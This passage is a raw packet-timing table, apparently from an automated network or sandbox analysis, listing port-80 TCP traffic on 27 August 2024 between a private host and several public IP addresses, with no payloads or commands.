                                                Aug 27, 2024 08:00:30.182873011 CEST8049876185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:00:30.182931900 CEST4987680192.168.11.20185.230.15.3
                                                Aug 27, 2024 08:00:30.182981014 CEST4987680192.168.11.20185.230.15.3
                                                Aug 27, 2024 08:00:30.183047056 CEST4987680192.168.11.20185.230.15.3
                                                Aug 27, 2024 08:00:30.183113098 CEST8049876185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:00:30.183218002 CEST4987680192.168.11.20185.230.15.3
                                                Aug 27, 2024 08:00:30.183235884 CEST8049876185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:00:30.183245897 CEST8049876185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:00:30.183351040 CEST8049876185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:00:30.183387995 CEST4987680192.168.11.20185.230.15.3
                                                Aug 27, 2024 08:00:30.183506012 CEST8049876185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:00:30.183515072 CEST8049876185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:00:30.183557034 CEST4987680192.168.11.20185.230.15.3
                                                Aug 27, 2024 08:00:30.183614016 CEST8049876185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:00:30.183623075 CEST8049876185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:00:30.183734894 CEST8049876185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:00:30.183861017 CEST8049876185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:00:30.183988094 CEST8049876185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:00:30.183995962 CEST8049876185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:00:30.184004068 CEST8049876185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:00:30.184109926 CEST8049876185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:00:30.184251070 CEST8049876185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:00:30.184259892 CEST8049876185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:00:30.184267998 CEST8049876185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:00:30.422287941 CEST8049876185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:00:30.422378063 CEST8049876185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:00:30.422386885 CEST8049876185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:00:30.422498941 CEST8049876185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:00:30.422750950 CEST8049876185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:00:30.422759056 CEST8049876185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:00:30.422766924 CEST8049876185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:00:30.422804117 CEST8049876185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:00:30.422873020 CEST8049876185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:00:30.423000097 CEST8049876185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:00:30.423008919 CEST8049876185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:00:30.423018932 CEST8049876185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:00:30.481420994 CEST8049876185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:00:30.481484890 CEST8049876185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:00:30.481689930 CEST4987680192.168.11.20185.230.15.3
                                                Aug 27, 2024 08:00:31.218888044 CEST4987680192.168.11.20185.230.15.3
                                                Aug 27, 2024 08:00:32.236258984 CEST4987780192.168.11.20185.230.15.3
                                                Aug 27, 2024 08:00:32.475434065 CEST8049877185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:00:32.475702047 CEST4987780192.168.11.20185.230.15.3
                                                Aug 27, 2024 08:00:32.482604980 CEST4987780192.168.11.20185.230.15.3
                                                Aug 27, 2024 08:00:32.721803904 CEST8049877185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:00:32.773437023 CEST8049877185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:00:32.773525953 CEST8049877185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:00:32.773698092 CEST4987780192.168.11.20185.230.15.3
                                                Aug 27, 2024 08:00:32.775454044 CEST4987780192.168.11.20185.230.15.3
                                                Aug 27, 2024 08:00:33.014574051 CEST8049877185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:00:37.783746958 CEST4987880192.168.11.20199.59.243.226
                                                Aug 27, 2024 08:00:37.884320021 CEST8049878199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:37.884591103 CEST4987880192.168.11.20199.59.243.226
                                                Aug 27, 2024 08:00:37.892110109 CEST4987880192.168.11.20199.59.243.226
                                                Aug 27, 2024 08:00:37.992676020 CEST8049878199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:37.994493008 CEST8049878199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:37.994594097 CEST8049878199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:37.994605064 CEST8049878199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:37.994807959 CEST4987880192.168.11.20199.59.243.226
                                                Aug 27, 2024 08:00:37.998471022 CEST8049878199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:37.998603106 CEST4987880192.168.11.20199.59.243.226
                                                Aug 27, 2024 08:00:39.404589891 CEST4987880192.168.11.20199.59.243.226
                                                Aug 27, 2024 08:00:40.422022104 CEST4987980192.168.11.20199.59.243.226
                                                Aug 27, 2024 08:00:40.522794962 CEST8049879199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:40.523055077 CEST4987980192.168.11.20199.59.243.226
                                                Aug 27, 2024 08:00:40.530560970 CEST4987980192.168.11.20199.59.243.226
                                                Aug 27, 2024 08:00:40.631314993 CEST8049879199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:40.633126974 CEST8049879199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:40.633229017 CEST8049879199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:40.633240938 CEST8049879199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:40.633351088 CEST4987980192.168.11.20199.59.243.226
                                                Aug 27, 2024 08:00:40.637948990 CEST8049879199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:40.638045073 CEST4987980192.168.11.20199.59.243.226
                                                Aug 27, 2024 08:00:42.044622898 CEST4987980192.168.11.20199.59.243.226
                                                Aug 27, 2024 08:00:43.062009096 CEST4988080192.168.11.20199.59.243.226
                                                Aug 27, 2024 08:00:43.162787914 CEST8049880199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:43.162961960 CEST4988080192.168.11.20199.59.243.226
                                                Aug 27, 2024 08:00:43.171567917 CEST4988080192.168.11.20199.59.243.226
                                                Aug 27, 2024 08:00:43.171602964 CEST4988080192.168.11.20199.59.243.226
                                                Aug 27, 2024 08:00:43.171670914 CEST4988080192.168.11.20199.59.243.226
                                                Aug 27, 2024 08:00:43.171843052 CEST4988080192.168.11.20199.59.243.226
                                                Aug 27, 2024 08:00:43.272310972 CEST8049880199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:43.272392035 CEST8049880199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:43.272401094 CEST8049880199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:43.272478104 CEST4988080192.168.11.20199.59.243.226
                                                Aug 27, 2024 08:00:43.272526979 CEST8049880199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:43.272538900 CEST8049880199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:43.272648096 CEST4988080192.168.11.20199.59.243.226
                                                Aug 27, 2024 08:00:43.272672892 CEST8049880199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:43.272783995 CEST8049880199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:43.272793055 CEST4988080192.168.11.20199.59.243.226
                                                Aug 27, 2024 08:00:43.272794008 CEST8049880199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:43.272803068 CEST8049880199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:43.272912979 CEST8049880199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:43.272984982 CEST4988080192.168.11.20199.59.243.226
                                                Aug 27, 2024 08:00:43.273134947 CEST4988080192.168.11.20199.59.243.226
                                                Aug 27, 2024 08:00:43.373380899 CEST8049880199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:43.373477936 CEST8049880199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:43.373486996 CEST8049880199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:43.373495102 CEST8049880199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:43.373538017 CEST4988080192.168.11.20199.59.243.226
                                                Aug 27, 2024 08:00:43.373600960 CEST8049880199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:43.373613119 CEST8049880199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:43.373620987 CEST8049880199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:43.373723030 CEST8049880199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:43.373744011 CEST4988080192.168.11.20199.59.243.226
                                                Aug 27, 2024 08:00:43.373878956 CEST8049880199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:43.373888969 CEST8049880199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:43.373900890 CEST4988080192.168.11.20199.59.243.226
                                                Aug 27, 2024 08:00:43.373970985 CEST8049880199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:43.374224901 CEST8049880199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:43.374234915 CEST8049880199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:43.374357939 CEST8049880199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:43.374367952 CEST8049880199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:43.374474049 CEST8049880199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:43.374602079 CEST8049880199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:43.374612093 CEST8049880199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:43.374619961 CEST8049880199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:43.374653101 CEST8049880199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:43.474185944 CEST8049880199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:43.474276066 CEST8049880199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:43.474397898 CEST8049880199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:43.474409103 CEST8049880199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:43.474522114 CEST8049880199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:43.474531889 CEST8049880199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:43.474651098 CEST8049880199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:43.474661112 CEST8049880199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:43.474771976 CEST8049880199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:43.474781036 CEST8049880199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:43.474895954 CEST8049880199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:43.474905968 CEST8049880199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:43.476402998 CEST8049880199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:43.476453066 CEST8049880199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:43.476505041 CEST8049880199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:43.476609945 CEST4988080192.168.11.20199.59.243.226
                                                Aug 27, 2024 08:00:43.476609945 CEST4988080192.168.11.20199.59.243.226
                                                Aug 27, 2024 08:00:43.482640028 CEST8049880199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:43.482734919 CEST4988080192.168.11.20199.59.243.226
                                                Aug 27, 2024 08:00:44.684668064 CEST4988080192.168.11.20199.59.243.226
                                                Aug 27, 2024 08:00:45.702028990 CEST4988180192.168.11.20199.59.243.226
                                                Aug 27, 2024 08:00:45.802684069 CEST8049881199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:45.802936077 CEST4988180192.168.11.20199.59.243.226
                                                Aug 27, 2024 08:00:45.807940006 CEST4988180192.168.11.20199.59.243.226
                                                Aug 27, 2024 08:00:45.908490896 CEST8049881199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:45.910274029 CEST8049881199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:45.910377026 CEST8049881199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:45.910387039 CEST8049881199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:45.910770893 CEST4988180192.168.11.20199.59.243.226
                                                Aug 27, 2024 08:00:45.912575960 CEST4988180192.168.11.20199.59.243.226
                                                Aug 27, 2024 08:00:45.914531946 CEST8049881199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:45.914819002 CEST4988180192.168.11.20199.59.243.226
                                                Aug 27, 2024 08:00:46.013052940 CEST8049881199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:51.368015051 CEST4988280192.168.11.2085.159.66.93
                                                Aug 27, 2024 08:00:51.591592073 CEST804988285.159.66.93192.168.11.20
                                                Aug 27, 2024 08:00:51.591763973 CEST4988280192.168.11.2085.159.66.93
                                                Aug 27, 2024 08:00:51.599246979 CEST4988280192.168.11.2085.159.66.93
                                                Aug 27, 2024 08:00:51.831715107 CEST804988285.159.66.93192.168.11.20
                                                Aug 27, 2024 08:00:51.831882000 CEST4988280192.168.11.2085.159.66.93
                                                Aug 27, 2024 08:00:53.104798079 CEST4988280192.168.11.2085.159.66.93
                                                Aug 27, 2024 08:00:54.122210979 CEST4988380192.168.11.2085.159.66.93
                                                Aug 27, 2024 08:00:54.345797062 CEST804988385.159.66.93192.168.11.20
                                                Aug 27, 2024 08:00:54.345999002 CEST4988380192.168.11.2085.159.66.93
                                                Aug 27, 2024 08:00:54.353516102 CEST4988380192.168.11.2085.159.66.93
                                                Aug 27, 2024 08:00:54.578942060 CEST804988385.159.66.93192.168.11.20
                                                Aug 27, 2024 08:00:54.579088926 CEST4988380192.168.11.2085.159.66.93
                                                Aug 27, 2024 08:00:55.854353905 CEST4988380192.168.11.2085.159.66.93
                                                Aug 27, 2024 08:00:56.871581078 CEST4988480192.168.11.2085.159.66.93
                                                Aug 27, 2024 08:00:57.102570057 CEST804988485.159.66.93192.168.11.20
                                                Aug 27, 2024 08:00:57.102708101 CEST4988480192.168.11.2085.159.66.93
                                                Aug 27, 2024 08:00:57.111351013 CEST4988480192.168.11.2085.159.66.93
                                                Aug 27, 2024 08:00:57.111437082 CEST4988480192.168.11.2085.159.66.93
                                                Aug 27, 2024 08:00:57.342390060 CEST804988485.159.66.93192.168.11.20
                                                Aug 27, 2024 08:00:57.342437983 CEST804988485.159.66.93192.168.11.20
                                                Aug 27, 2024 08:00:57.342623949 CEST804988485.159.66.93192.168.11.20
                                                Aug 27, 2024 08:00:57.342683077 CEST4988480192.168.11.2085.159.66.93
                                                Aug 27, 2024 08:00:57.342812061 CEST804988485.159.66.93192.168.11.20
                                                Aug 27, 2024 08:00:57.342860937 CEST4988480192.168.11.2085.159.66.93
                                                Aug 27, 2024 08:00:57.342946053 CEST804988485.159.66.93192.168.11.20
                                                Aug 27, 2024 08:00:57.343019962 CEST4988480192.168.11.2085.159.66.93
                                                Aug 27, 2024 08:00:57.343172073 CEST4988480192.168.11.2085.159.66.93
                                                Aug 27, 2024 08:00:57.573738098 CEST804988485.159.66.93192.168.11.20
                                                Aug 27, 2024 08:00:57.573812008 CEST804988485.159.66.93192.168.11.20
                                                Aug 27, 2024 08:00:57.573910952 CEST804988485.159.66.93192.168.11.20
                                                Aug 27, 2024 08:00:57.573977947 CEST4988480192.168.11.2085.159.66.93
                                                Aug 27, 2024 08:00:57.574032068 CEST804988485.159.66.93192.168.11.20
                                                Aug 27, 2024 08:00:57.574140072 CEST4988480192.168.11.2085.159.66.93
                                                Aug 27, 2024 08:00:57.574270010 CEST804988485.159.66.93192.168.11.20
                                                Aug 27, 2024 08:00:57.574286938 CEST4988480192.168.11.2085.159.66.93
                                                Aug 27, 2024 08:00:57.574363947 CEST804988485.159.66.93192.168.11.20
                                                Aug 27, 2024 08:00:57.574508905 CEST804988485.159.66.93192.168.11.20
                                                Aug 27, 2024 08:00:57.574692965 CEST804988485.159.66.93192.168.11.20
                                                Aug 27, 2024 08:00:57.805023909 CEST804988485.159.66.93192.168.11.20
                                                Aug 27, 2024 08:00:57.805111885 CEST804988485.159.66.93192.168.11.20
                                                Aug 27, 2024 08:00:57.805130005 CEST804988485.159.66.93192.168.11.20
                                                Aug 27, 2024 08:00:57.805464029 CEST804988485.159.66.93192.168.11.20
                                                Aug 27, 2024 08:00:57.805480957 CEST804988485.159.66.93192.168.11.20
                                                Aug 27, 2024 08:00:57.805711031 CEST804988485.159.66.93192.168.11.20
                                                Aug 27, 2024 08:00:57.807780027 CEST804988485.159.66.93192.168.11.20
                                                Aug 27, 2024 08:00:57.807969093 CEST4988480192.168.11.2085.159.66.93
                                                Aug 27, 2024 08:00:58.619208097 CEST4988480192.168.11.2085.159.66.93
                                                Aug 27, 2024 08:00:59.638735056 CEST4988580192.168.11.2085.159.66.93
                                                Aug 27, 2024 08:00:59.870804071 CEST804988585.159.66.93192.168.11.20
                                                Aug 27, 2024 08:00:59.871068001 CEST4988580192.168.11.2085.159.66.93
                                                Aug 27, 2024 08:00:59.880530119 CEST4988580192.168.11.2085.159.66.93
                                                Aug 27, 2024 08:01:00.113989115 CEST804988585.159.66.93192.168.11.20
                                                Aug 27, 2024 08:01:00.114185095 CEST4988580192.168.11.2085.159.66.93
                                                Aug 27, 2024 08:01:00.116003036 CEST4988580192.168.11.2085.159.66.93
                                                Aug 27, 2024 08:01:00.346632004 CEST804988585.159.66.93192.168.11.20
                                                Aug 27, 2024 08:01:05.349841118 CEST4988680192.168.11.20176.57.64.102
                                                Aug 27, 2024 08:01:05.477984905 CEST8049886176.57.64.102192.168.11.20
                                                Aug 27, 2024 08:01:05.478151083 CEST4988680192.168.11.20176.57.64.102
                                                Aug 27, 2024 08:01:05.485650063 CEST4988680192.168.11.20176.57.64.102
                                                Aug 27, 2024 08:01:05.613992929 CEST8049886176.57.64.102192.168.11.20
                                                Aug 27, 2024 08:01:05.754682064 CEST8049886176.57.64.102192.168.11.20
                                                Aug 27, 2024 08:01:05.754702091 CEST8049886176.57.64.102192.168.11.20
                                                Aug 27, 2024 08:01:05.754849911 CEST4988680192.168.11.20176.57.64.102
                                                Aug 27, 2024 08:01:06.992398977 CEST4988680192.168.11.20176.57.64.102
                                                Aug 27, 2024 08:01:08.009757042 CEST4988780192.168.11.20176.57.64.102
                                                Aug 27, 2024 08:01:08.137468100 CEST8049887176.57.64.102192.168.11.20
                                                Aug 27, 2024 08:01:08.137593031 CEST4988780192.168.11.20176.57.64.102
                                                Aug 27, 2024 08:01:08.145081997 CEST4988780192.168.11.20176.57.64.102
                                                Aug 27, 2024 08:01:08.273437023 CEST8049887176.57.64.102192.168.11.20
                                                Aug 27, 2024 08:01:08.416161060 CEST8049887176.57.64.102192.168.11.20
                                                Aug 27, 2024 08:01:08.416178942 CEST8049887176.57.64.102192.168.11.20
                                                Aug 27, 2024 08:01:08.416292906 CEST4988780192.168.11.20176.57.64.102
                                                Aug 27, 2024 08:01:09.648056984 CEST4988780192.168.11.20176.57.64.102
                                                Aug 27, 2024 08:01:10.665422916 CEST4988880192.168.11.20176.57.64.102
                                                Aug 27, 2024 08:01:10.793404102 CEST8049888176.57.64.102192.168.11.20
                                                Aug 27, 2024 08:01:10.793673992 CEST4988880192.168.11.20176.57.64.102
                                                Aug 27, 2024 08:01:10.802206993 CEST4988880192.168.11.20176.57.64.102
                                                Aug 27, 2024 08:01:10.802246094 CEST4988880192.168.11.20176.57.64.102
                                                Aug 27, 2024 08:01:10.802320004 CEST4988880192.168.11.20176.57.64.102
                                                Aug 27, 2024 08:01:10.930547953 CEST8049888176.57.64.102192.168.11.20
                                                Aug 27, 2024 08:01:10.930778980 CEST4988880192.168.11.20176.57.64.102
                                                Aug 27, 2024 08:01:10.930951118 CEST4988880192.168.11.20176.57.64.102
                                                Aug 27, 2024 08:01:10.931112051 CEST4988880192.168.11.20176.57.64.102
                                                Aug 27, 2024 08:01:11.058399916 CEST8049888176.57.64.102192.168.11.20
                                                Aug 27, 2024 08:01:11.058568954 CEST4988880192.168.11.20176.57.64.102
                                                Aug 27, 2024 08:01:11.058742046 CEST4988880192.168.11.20176.57.64.102
                                                Aug 27, 2024 08:01:11.059603930 CEST8049888176.57.64.102192.168.11.20
                                                Aug 27, 2024 08:01:11.059779882 CEST4988880192.168.11.20176.57.64.102
                                                Aug 27, 2024 08:01:11.059952974 CEST4988880192.168.11.20176.57.64.102
                                                Aug 27, 2024 08:01:11.060614109 CEST8049888176.57.64.102192.168.11.20
                                                Aug 27, 2024 08:01:11.187057018 CEST8049888176.57.64.102192.168.11.20
                                                Aug 27, 2024 08:01:11.188043118 CEST8049888176.57.64.102192.168.11.20
                                                Aug 27, 2024 08:01:11.188940048 CEST8049888176.57.64.102192.168.11.20
                                                Aug 27, 2024 08:01:11.419682980 CEST8049888176.57.64.102192.168.11.20
                                                Aug 27, 2024 08:01:11.419697046 CEST8049888176.57.64.102192.168.11.20
                                                Aug 27, 2024 08:01:11.419857979 CEST4988880192.168.11.20176.57.64.102
                                                Aug 27, 2024 08:01:12.303828001 CEST4988880192.168.11.20176.57.64.102
                                                Aug 27, 2024 08:01:13.321146011 CEST4988980192.168.11.20176.57.64.102
                                                Aug 27, 2024 08:01:13.448893070 CEST8049889176.57.64.102192.168.11.20
                                                Aug 27, 2024 08:01:13.449049950 CEST4988980192.168.11.20176.57.64.102
                                                Aug 27, 2024 08:01:13.454077005 CEST4988980192.168.11.20176.57.64.102
                                                Aug 27, 2024 08:01:13.582997084 CEST8049889176.57.64.102192.168.11.20
                                                Aug 27, 2024 08:01:13.839389086 CEST8049889176.57.64.102192.168.11.20
                                                Aug 27, 2024 08:01:13.839402914 CEST8049889176.57.64.102192.168.11.20
                                                Aug 27, 2024 08:01:13.839744091 CEST4988980192.168.11.20176.57.64.102
                                                Aug 27, 2024 08:01:13.841541052 CEST4988980192.168.11.20176.57.64.102
                                                Aug 27, 2024 08:01:13.969599009 CEST8049889176.57.64.102192.168.11.20
                                                Aug 27, 2024 08:01:18.957633018 CEST4989080192.168.11.2076.223.54.146
                                                Aug 27, 2024 08:01:19.061208963 CEST804989076.223.54.146192.168.11.20
                                                Aug 27, 2024 08:01:19.061459064 CEST4989080192.168.11.2076.223.54.146
                                                Aug 27, 2024 08:01:19.069380045 CEST4989080192.168.11.2076.223.54.146
                                                Aug 27, 2024 08:01:19.171917915 CEST804989076.223.54.146192.168.11.20
                                                Aug 27, 2024 08:01:19.172632933 CEST804989076.223.54.146192.168.11.20
                                                Aug 27, 2024 08:01:19.172925949 CEST4989080192.168.11.2076.223.54.146
                                                Aug 27, 2024 08:01:20.583249092 CEST4989080192.168.11.2076.223.54.146
                                                Aug 27, 2024 08:01:20.685673952 CEST804989076.223.54.146192.168.11.20
                                                Aug 27, 2024 08:01:21.600884914 CEST4989180192.168.11.2076.223.54.146
                                                Aug 27, 2024 08:01:21.703855038 CEST804989176.223.54.146192.168.11.20
                                                Aug 27, 2024 08:01:21.704090118 CEST4989180192.168.11.2076.223.54.146
                                                Aug 27, 2024 08:01:21.711556911 CEST4989180192.168.11.2076.223.54.146
                                                Aug 27, 2024 08:01:21.814892054 CEST804989176.223.54.146192.168.11.20
                                                Aug 27, 2024 08:01:21.816194057 CEST804989176.223.54.146192.168.11.20
                                                Aug 27, 2024 08:01:24.240643024 CEST4989280192.168.11.2076.223.54.146
                                                Aug 27, 2024 08:01:24.345504045 CEST804989276.223.54.146192.168.11.20
                                                Aug 27, 2024 08:01:24.345688105 CEST4989280192.168.11.2076.223.54.146
                                                Aug 27, 2024 08:01:24.354347944 CEST4989280192.168.11.2076.223.54.146
                                                Aug 27, 2024 08:01:24.354366064 CEST4989280192.168.11.2076.223.54.146
                                                Aug 27, 2024 08:01:24.354417086 CEST4989280192.168.11.2076.223.54.146
                                                Aug 27, 2024 08:01:24.457849026 CEST804989276.223.54.146192.168.11.20
                                                Aug 27, 2024 08:01:24.458065033 CEST4989280192.168.11.2076.223.54.146
                                                Aug 27, 2024 08:01:24.458277941 CEST804989276.223.54.146192.168.11.20
                                                Aug 27, 2024 08:01:24.458395004 CEST804989276.223.54.146192.168.11.20
                                                Aug 27, 2024 08:01:24.458405972 CEST804989276.223.54.146192.168.11.20
                                                Aug 27, 2024 08:01:24.458420038 CEST4989280192.168.11.2076.223.54.146
                                                Aug 27, 2024 08:01:24.458621979 CEST4989280192.168.11.2076.223.54.146
                                                Aug 27, 2024 08:01:24.458758116 CEST4989280192.168.11.2076.223.54.146
                                                Aug 27, 2024 08:01:24.460119963 CEST804989276.223.54.146192.168.11.20
                                                Aug 27, 2024 08:01:24.561737061 CEST804989276.223.54.146192.168.11.20
                                                Aug 27, 2024 08:01:24.561836004 CEST804989276.223.54.146192.168.11.20
                                                Aug 27, 2024 08:01:24.561968088 CEST804989276.223.54.146192.168.11.20
                                                Aug 27, 2024 08:01:24.561979055 CEST804989276.223.54.146192.168.11.20
                                                Aug 27, 2024 08:01:24.562088013 CEST804989276.223.54.146192.168.11.20
                                                Aug 27, 2024 08:01:24.562340021 CEST804989276.223.54.146192.168.11.20
                                                Aug 27, 2024 08:01:24.562350988 CEST804989276.223.54.146192.168.11.20
                                                Aug 27, 2024 08:01:24.562458992 CEST804989276.223.54.146192.168.11.20
                                                Aug 27, 2024 08:01:24.562586069 CEST804989276.223.54.146192.168.11.20
                                                Aug 27, 2024 08:01:24.562863111 CEST804989276.223.54.146192.168.11.20
                                                Aug 27, 2024 08:01:24.562874079 CEST804989276.223.54.146192.168.11.20
                                                Aug 27, 2024 08:01:24.562989950 CEST804989276.223.54.146192.168.11.20
                                                Aug 27, 2024 08:01:24.563000917 CEST804989276.223.54.146192.168.11.20
                                                Aug 27, 2024 08:01:24.563072920 CEST804989276.223.54.146192.168.11.20
                                                Aug 27, 2024 08:01:24.563081026 CEST804989276.223.54.146192.168.11.20
                                                Aug 27, 2024 08:01:24.563194990 CEST804989276.223.54.146192.168.11.20
                                                Aug 27, 2024 08:01:26.880743980 CEST4989380192.168.11.2076.223.54.146
                                                Aug 27, 2024 08:01:26.987397909 CEST804989376.223.54.146192.168.11.20
                                                Aug 27, 2024 08:01:26.987893105 CEST4989380192.168.11.2076.223.54.146
                                                Aug 27, 2024 08:01:26.993096113 CEST4989380192.168.11.2076.223.54.146
                                                Aug 27, 2024 08:01:27.095834017 CEST804989376.223.54.146192.168.11.20
                                                Aug 27, 2024 08:01:27.097039938 CEST804989376.223.54.146192.168.11.20
                                                Aug 27, 2024 08:01:27.097138882 CEST804989376.223.54.146192.168.11.20
                                                Aug 27, 2024 08:01:27.097400904 CEST4989380192.168.11.2076.223.54.146
                                                Aug 27, 2024 08:01:27.099150896 CEST4989380192.168.11.2076.223.54.146
                                                Aug 27, 2024 08:01:27.201657057 CEST804989376.223.54.146192.168.11.20
                                                Aug 27, 2024 08:03:07.665158987 CEST4989580192.168.11.20199.59.243.226
                                                Aug 27, 2024 08:03:07.765722990 CEST8049895199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:03:07.765836000 CEST4989580192.168.11.20199.59.243.226
                                                Aug 27, 2024 08:03:07.770872116 CEST4989580192.168.11.20199.59.243.226
                                                Aug 27, 2024 08:03:07.871618032 CEST8049895199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:03:07.873545885 CEST8049895199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:03:07.873616934 CEST8049895199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:03:07.873673916 CEST8049895199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:03:07.873897076 CEST4989580192.168.11.20199.59.243.226
                                                Aug 27, 2024 08:03:07.873898029 CEST4989580192.168.11.20199.59.243.226
                                                Aug 27, 2024 08:03:07.875678062 CEST4989580192.168.11.20199.59.243.226
                                                Aug 27, 2024 08:03:07.878917933 CEST8049895199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:03:07.879072905 CEST4989580192.168.11.20199.59.243.226
                                                Aug 27, 2024 08:03:07.976242065 CEST8049895199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:03:12.889123917 CEST4989680192.168.11.20103.247.8.53
                                                Aug 27, 2024 08:03:13.233875036 CEST8049896103.247.8.53192.168.11.20
                                                Aug 27, 2024 08:03:13.234117031 CEST4989680192.168.11.20103.247.8.53
                                                Aug 27, 2024 08:03:13.241627932 CEST4989680192.168.11.20103.247.8.53
                                                Aug 27, 2024 08:03:13.586087942 CEST8049896103.247.8.53192.168.11.20
                                                Aug 27, 2024 08:03:13.760560989 CEST8049896103.247.8.53192.168.11.20
                                                Aug 27, 2024 08:03:13.760643005 CEST8049896103.247.8.53192.168.11.20
                                                Aug 27, 2024 08:03:13.760761023 CEST8049896103.247.8.53192.168.11.20
                                                Aug 27, 2024 08:03:13.760814905 CEST8049896103.247.8.53192.168.11.20
                                                Aug 27, 2024 08:03:13.760881901 CEST4989680192.168.11.20103.247.8.53
                                                Aug 27, 2024 08:03:13.760885954 CEST8049896103.247.8.53192.168.11.20
                                                Aug 27, 2024 08:03:13.761003017 CEST8049896103.247.8.53192.168.11.20
